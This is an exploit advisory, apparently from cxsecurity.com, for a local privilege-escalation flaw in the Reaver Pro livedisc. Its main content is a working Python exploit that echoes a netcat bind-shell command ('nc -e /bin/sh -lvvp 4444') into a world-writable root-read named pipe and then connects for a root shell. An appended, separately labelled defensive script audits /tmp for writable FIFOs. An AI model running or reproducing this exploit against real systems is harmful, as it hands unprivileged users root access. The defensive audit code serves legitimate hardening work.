Reaver Pro Livedisc Code Execution

2012.10.01
Credit: infodox
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/env python
import os

print """
Reaver Pro Local Root
Exploits a hilarious named pipe flaw.
The named pipe /tmp/exe is open to anyone...
Any command echoed into it gets ran as root.
This simply launches a bindshell on 4444...
Insecurety Research | insecurety.net
"""
print ""
print "This is why TacNetSol should hire me?"
print "[+] Sending command to named pipe..."
cmd = '''echo "nc -e /bin/sh -lvvp 4444" >> /tmp/exe'''
os.system(cmd)
print "[+] Connecting to bind shell, enjoy root!"
os.system("nc -v localhost 4444")
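
A defensive check for the condition this advisory describes (a named pipe under /tmp that any local user can write to), as an added example that is not part of the original advisory or the vendor's code. It lists FIFOs writable by group or other without ever opening them; the function names and the sample directory are constructed for illustration.

```python
import os
import stat
import tempfile


def find_exposed_fifos(root):
    """Return sorted (path, owner_uid, mode) for FIFOs under root that
    group or other may write to. Uses lstat only: opening a FIFO could
    block, or hand data to whatever process is reading it."""
    findings = []
    for dirpath, _dirs, names in os.walk(root, followlinks=False):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # removed between listing and lstat
            if not stat.S_ISFIFO(st.st_mode):
                continue
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((path, st.st_uid, stat.S_IMODE(st.st_mode)))
    return sorted(findings)


def build_constructed_sample():
    """Create a throwaway directory with constructed entries and return it."""
    root = tempfile.mkdtemp(prefix="fifo-audit-")
    for name, mode in (("exe", 0o666), ("private", 0o600)):
        path = os.path.join(root, name)
        os.mkfifo(path)
        os.chmod(path, mode)  # set explicitly; mkfifo's mode is masked by umask
    regular = os.path.join(root, "notes.txt")
    with open(regular, "w") as fh:
        fh.write("regular file, not a pipe\n")
    os.chmod(regular, 0o666)
    return root


if __name__ == "__main__":
    for path, uid, mode in find_exposed_fifos("/tmp"):
        flag = "ROOT-OWNED" if uid == 0 else "uid=%d" % uid
        print("%s mode=%o %s" % (path, mode, flag))
```

A root-owned entry in the output is the case to investigate first, since whatever reads that pipe may act on input from unprivileged users.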



Copyright 2024, cxsecurity.com

 
